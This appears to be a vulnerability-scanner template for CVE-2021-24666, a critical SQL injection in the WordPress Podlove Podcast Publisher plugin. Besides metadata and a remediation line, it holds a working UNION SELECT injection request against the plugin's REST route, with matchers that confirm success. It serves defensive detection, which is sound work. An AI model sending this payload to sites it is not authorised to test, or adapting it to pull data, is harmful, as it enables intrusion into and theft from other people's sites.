id: CVE-2021-24666 info: name: WordPress Podlove Podcast Publisher <3.5.6 - SQL Injection author: theamanrawat severity: critical description: | WordPress Podlove Podcast Publisher plugin before 3.5.6 is susceptible to SQL injection. The Social & Donations module, not activated by default, adds the REST route /services/contributor/(?P[\d]+) and takes id and category parameters as arguments. Both parameters can be exploited, thereby potentially enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. remediation: Fixed in version 3.5.6. reference: - https://wpscan.com/vulnerability/fb4d7988-60ff-4862-96a1-80b1866336fe - https://wordpress.org/plugins/podlove-podcasting-plugin-for-wordpress/ - https://github.com/podlove/podlove-publisher/commit/aa8a343a2e2333b34a422f801adee09b020c6d76 - https://nvd.nist.gov/vuln/detail/CVE-2021-24666 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-24666 cwe-id: CWE-89 epss-score: 0.23542 epss-percentile: 0.96082 cpe: cpe:2.3:a:podlove:podlove_podcast_publisher:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: podlove product: podlove_podcast_publisher framework: wordpress tags: cve2021,sqli,wordpress,wp-plugin,wp,podlove-podcasting-plugin-for-wordpress,wpscan,cve http: - method: GET path: - "{{BaseURL}}/index.php?rest_route=/podlove/v1/social/services/contributor/1&id=1%20UNION%20ALL%20SELECT%20NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL--%20-" matchers-condition: and matchers: - type: word part: body words: - '66a82937a7660b73b00d4f7cefee6c85' - '"service_id"' condition: and - type: word part: header words: - "application/json" - type: status status: - 200 # digest: 4b0a004830460221009423dad748f0b1eda1415265c6da1e510f4bf650c803337b5669780e8940b418022100f009fdc64fa452b0a80600b58c5da5f31069ebfb6090f85d94921d8db631c092:922c64590222798bb761d5b6d8e72950